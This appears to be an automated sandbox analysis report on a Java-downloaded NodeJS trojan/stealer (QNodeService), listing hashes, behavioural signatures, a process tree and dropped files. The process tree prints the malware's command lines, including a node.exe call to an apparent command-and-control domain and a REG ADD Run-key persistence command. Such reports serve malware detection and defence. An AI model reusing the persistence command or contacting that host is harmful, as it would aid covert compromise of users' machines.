Analysis
-
max time kernel
129s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25-11-2020 06:59
Static task
static1
Behavioral task
behavioral1
Sample
4b62b502ab63d3c23386068954fa7c73.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
4b62b502ab63d3c23386068954fa7c73.jar
Resource
win10v20201028
General
-
Target
4b62b502ab63d3c23386068954fa7c73.jar
-
Size
54KB
-
MD5
4b62b502ab63d3c23386068954fa7c73
-
SHA1
079c3c46af6b94fb838e3382bf0a0628eb636d3b
-
SHA256
61f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828
-
SHA512
10841dca540e8ef0e8e675e6f58ff7c87cfe1caf820a1083e52bfa826823e9ba1282f28735fffee6158319469b9646919166c3fa31e85f52f458b17ebd66150e
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 2284 node.exe 940 node.exe 1332 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\7b7d076e-a6f1-40c6-80da-6e8913d26ac0 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 2284 node.exe 2284 node.exe 2284 node.exe 2284 node.exe 940 node.exe 940 node.exe 940 node.exe 940 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe 1332 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.exedescription pid process target process PID 656 wrote to memory of 4080 656 java.exe javaw.exe PID 656 wrote to memory of 4080 656 java.exe javaw.exe PID 4080 wrote to memory of 2284 4080 javaw.exe node.exe PID 4080 wrote to memory of 2284 4080 javaw.exe node.exe PID 2284 wrote to memory of 940 2284 node.exe node.exe PID 2284 wrote to memory of 940 2284 node.exe node.exe PID 940 wrote to memory of 1332 940 node.exe node.exe PID 940 wrote to memory of 1332 940 node.exe node.exe PID 1332 wrote to memory of 3824 1332 node.exe cmd.exe PID 1332 wrote to memory of 3824 1332 node.exe cmd.exe PID 3824 wrote to memory of 4064 3824 cmd.exe reg.exe PID 3824 wrote to memory of 4064 3824 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\4b62b502ab63d3c23386068954fa7c73.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\555bab1c.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain helpdesk.servebeer.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
d90f60d7de79dd385ac5924064d5990c
SHA115d0bb24d7691881c5df0984758dbedab65eedd5
SHA2569e594c60f859a967f4bb2b99b77bf5db88856693c80dfb8b4f827b08eca84d67
SHA5120842a28bc210f70bd0cb2b761e7571ade8cb2c97f108bd25473f1200dfd0ff943d9b09b9c368c3c487680d0fd6d5fb84050cc52bce17c5d40bf303bda39993e7
-
C:\Users\Admin\AppData\Local\Temp\555bab1c.tmpMD5
4b62b502ab63d3c23386068954fa7c73
SHA1079c3c46af6b94fb838e3382bf0a0628eb636d3b
SHA25661f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828
SHA51210841dca540e8ef0e8e675e6f58ff7c87cfe1caf820a1083e52bfa826823e9ba1282f28735fffee6158319469b9646919166c3fa31e85f52f458b17ebd66150e
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/940-174-0x0000000000000000-mapping.dmp
-
memory/940-176-0x0000026787740000-0x0000026787741000-memory.dmpFilesize
4KB
-
memory/1332-178-0x0000000000000000-mapping.dmp
-
memory/1332-180-0x0000026037780000-0x0000026037781000-memory.dmpFilesize
4KB
-
memory/2284-173-0x0000035A8FE00000-0x0000035A8FE01000-memory.dmpFilesize
4KB
-
memory/2284-169-0x0000000000000000-mapping.dmp
-
memory/3824-181-0x0000000000000000-mapping.dmp
-
memory/4064-182-0x0000000000000000-mapping.dmp
-
memory/4080-52-0x0000000000000000-mapping.dmp